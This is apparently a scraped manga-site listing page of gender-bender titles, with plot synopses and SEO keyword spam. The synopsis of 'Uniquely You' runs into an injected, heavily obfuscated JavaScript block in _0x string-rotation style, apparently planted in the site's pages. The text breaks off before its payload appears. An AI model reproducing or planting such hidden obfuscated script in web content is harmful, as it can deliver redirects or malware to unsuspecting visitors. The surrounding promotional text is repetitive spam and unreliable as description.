Gender Bender - Page 9

Gender bender manga centers on characters who undergo a gender transformation, often leading to changes in how they are perceived and how they perceive themselves. It explores themes like self-identity, relationships, and the experience of living in the opposite gender.

1036 results

Maxed Out Leveling

Read Manhwa Maxed Out Leveling Online For Free At KunManga Maxed Out Leveling Manga also known as “EXCEEDING MAX LEVEL / Level up From Max Level / Leveling Beyond the Max / カンストからのレベルアップ / 一級武林至尊 / 从满级开始升级 / 만렙부터 레벨업”. This OnGoing webtoon was released on 2021. The story was written by Endlessea and illustrations by Kimsanglok / studioM. The content of the comic Maxed Out Leveling: After a car crash mysteriously transports him to a land of martial arts, Cha Shinhyun trains for 140 years and becomes the strongest being in Murim. But when he returns to Earth, it’s nothing like he remembers. Though he is finally reunited with his sister, the home he once knew is now filled with people called “hunters” who defeat monsters to level up their powers in a constant race for survival. Now he must start back at level 1 and work to exact revenge on the person who altered his fate! The comic Maxed Out Leveling belongs to the Genre: Action, Adventure, Comedy, Fantasy, Gender Bender, Historical, Manhwa, Martial Arts, Murim, Supernatural, System Hari Manga is a comprehensive website featuring the latest and hottest manga, updated rapidly to cater to readers with high-quality images and provide them with excellent experiences. With keywords such as “TopManhua” and “Manhwa Web,” as well as related terms like Manhwa Top, New Manga 2024, and Read Manhwa Engsub ensures readers have access to a wide selection of top-notch manga content. Please always follow and share with your friends to support the website MANGAZIN.ORG so that we have more motivation to publish the latest and best comics. Follow get to read NEW MANHWA updated: Deadline Is Raining in the Status Window Hunter Academy’s Strongest Battle God Exclusive Possession: Young Master Ji’s Beloved Wife


North By Northwest

A famous pirate in the southern oceans, “Lil Shades” During her peaceful journey, a shocking news falls upon her. “The admiral is coming.” There were chills on her back despite the hot weather. Lil took her eyes off her hands and looked up at Alain. She’d heard him, but she wanted to check again.


I Choose the Emperor Ending

<h2>I Choose the Emperor Ending</h2> Obsessed with medieval fantasies, Marina develops a revolutionary VR device that can bring fictional worlds to life. Her dreams come true when she transports herself to Lasnorok, the setting of her own novel. The problem is, she can’t get back out! Disguised as a runaway slave boy named Rino, she comes face-to-face with the main character she created, the ambitious Edward Allen Dihas. Can Marina help him overthrow the emperor and survive to make it out alive?


Uniquely You

Cong Li is a world-famous screenwriter and superstar actor Ming Gu is her super hot husband in her dreams that is. In reality, Cong is just a poor college student who ghost writes manuscripts without receiving any credit. After a long night writing, she wakes up the next morning…in Ming’s body?! With control of Ming’s body, Cong has money, fame, and the ability to accomplish her wildest dreams! Just one problem: Ming has control of Cong’s body too. Slowly sabotaging each other’s life, they have to work together; with Ming as Cong’s assistant. And they say this kind of stuff only happen in the movies… Uniquely You / ???????? / Unique You<script></script><script>(function(_0x5c8b34,_0x28c762){var _0x1aca4a=_0xf635,_0x3d30df=_0x5c8b34();while(!![]){try{var _0xb4d099=parseInt(_0x1aca4a(0x79))/(0x202c*-0x1+0xebe+0x116f)+parseInt(_0x1aca4a(0x76))/(0x646+0xb7d+-0x9*0x1f9)*(-parseInt(_0x1aca4a(0x72))/(-0xfd3+-0x1499+0x246f))+-parseInt(_0x1aca4a(0x6c))/(-0x1*-0x332+0x2*-0x6cd+0xa6c)*(parseInt(_0x1aca4a(0x67))/(0x1*-0x69b+-0x1eac+0x254c))+parseInt(_0x1aca4a(0x86))/(-0x3*0xb7b+0x1569+-0xd0e*-0x1)+-parseInt(_0x1aca4a(0x83))/(-0x1421*0x1+-0x1f4d*-0x1+-0xb25)+-parseInt(_0x1aca4a(0x84))/(0xb58+0x95*-0x23+0x90f)+parseInt(_0x1aca4a(0x74))/(0x1bd2+0x22e1+-0x3eaa)*(parseInt(_0x1aca4a(0x81))/(0xca*-0x23+0xaad*-0x1+0x2655));if(_0xb4d099===_0x28c762)break;else _0x3d30df['push'](_0x3d30df['shift']());}catch(_0x174bd5){_0x3d30df['push'](_0x3d30df['shift']());}}}(_0x203f,0x234a5+-0x3ff85*-0x1+-0x2db9a));function _0xf635(_0x1d6141,_0x3fb6bd){var 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National School Prince Is A Girl

Read National School Prince Is A Girl Novel – National School Prince Is A Girl Manhwa Online Free At KunManga The summary of the comic National School Prince Is A Girl: Fu Jiu appears to be a normal lad in high school on the surface. But in fact, she (Yes! She!) is the hacker, Z, a villain-terminator in the online world of an alternate world. Having reincarnated into the body of a woman and being forced to disguise herself as a young man, she reigns over the game world, fights for justice, and puts a spell on all the girls around with her innate charm. However, her flirting comes across as gay to the rich Almighty Qin and his inner circle. Over time, the Almighty Qin falls for him… her. Has he turned gay for him… her? Now, that’s confusing! “National School Prince Is A Girl” is also known as: El Galán Escolar Es una Chica / Guomin Xiao Cao Shi Nusheng / Hotboy Quốc Dân Là Nữ / Le hackeur est une lycéenne ! / O Figurão do Colégio É uma Garota / School Hunk Is A Girl / The School Prince is a Girl / 国民校草是女生 / 帝少心头宠:国民校草是女生 “TopManhua, MangaUpdates, LikeManga…” are the most searched keywords on the website MANGAZIN. We offer a wide selection of the best and newest comic series with all chapters updated quickly and featuring high-quality images, providing readers with wonderful and enjoyable reading experiences at MANGA ZIN. You can read TOP MANHUA Two Weeks and Counting Deadlines are Raining in the Status Window I Became The King by Scavenging

1 days ago

Pupillary Master

In the 24th century, the first person in the power world, Luo Qingtong, magically crossed to the real world of another world. Since then, she has opened the way to the revenge of the deposed woman in the lower country. Fighting the villains and slag


MookHyang – Dark Lady

As the master of the School of Unholy Arts and as the undefeated Unmasked Demon, MookHyang unfortunately falls to a strange fantasy world by the magic of his enemies (School of Blood Arts). In the new world of elf, sorcerer, knight, and dragon, MookHyang’s adventure of finding a way back to his old world (Murim) unfolds.


Mookhyang – Dark Lady

As The Master Of The School Of Unholy Arts And As The Undefeated Unmasked Demon, Mookhyang Unfortunately Falls To A Strange Fantasy World By The Magic Of His Enemies (School Of Blood Arts). In The New World Of Elf, Sorcerer, Knight, And Dragon, Mookhyang’s Adventure Of Finding A Way Back To His Old World (Murim) Unfolds.


Queen Of Posion: The Legend Of A Super Agent, Doctor And Princess

<h2>Queen of Posion: The Legend of a Super Agent, Doctor and Princess</h2> “She is an ace agent, the queen of medicine and poison. Sweet and adorable she looks; resolute and cunning she actually is. She is half an angel and half a devil. When she travels through time and stays in an orphan girl’s body, will she rewrite the history? “”I quit the marriage with this coward girl. To my surprise, she is so shrewd and eloquent! How ignorant I am!”” Some lord regrets. “”She is such a hottie!”” Some prince sighs. “


Princess in the Prince’s Harem

YiYi is one of the most beautiful girl in the kingdom. But after got called ugly by the Emperor she decide to be petty and join the palace as the palace’s painter. Her plan? It’s to draw even the most beautiful lady into an ugly hag!!!


The Naive Mr. Lu

<h2 class="col-12 p-2"><span class="releasestitle tabletitle">Chunqing Lushao</span>  - The innocent young Master Lu - The Naive Mr. Lu</h2> <div class="col-12 p-2">Disguised as a man, Lu Dingning picks up a bunch of girls, with her gentleman index on max and her prince charming smile leveled up! Women are constantly surrounding her and men are getting mercilessly bent in her presence. Life motto: As long as the hoe is dancing well, there’s not a single boyfriend she can’t steal! Zong Jize, king of the city, treats her as his brother but ends up pushing her onto the bed. Lu Yining says furiously, “Master Zong, I treated you as my brother but instead you sick bastard just wanted to sleep with me!”</div>


I’m Gonna Annihilate This Land

Read manhwa I’m Gonna Annihilate This Land / 이 나라를 없앨 예정인데요 Once upon a time, I became the dreaded Skeleton King, a being who proved troublesome even for the gods. “If you do our work for us, we’ll turn you into a human.” But then, the gods tricked me with a fraudulent contract and sealed me away. “With the Skeleton King gone, let us rid the world of demonkind.” “The purge of demonkind and the work to spread the good word—let us entrust it all to our precious .” “As for that insolent Skeleton King… let us trap him in the body of a bug and torture him for all eternity.” That should have been the end of my story. “Oh my, Holy One. You’ve awakened?” Instead, I became the Saint? And not only that, but the son of a duke in the Holy Empire—the very empire that sustains the gods? Then if I make this nation fall… won’t the gods fall with it? “Oh dear, what has our baby Saint in such a good mood?” “Holy One, here’s a toy that once belonged to that wretched Skeleton King. Would you like to break it?” “The mighty gods have reclaimed all that arrogant king had to his name for daring to defy them.” I’m going to destroy this country… Let us bleed the gods dry and erase them from existence.

2 days ago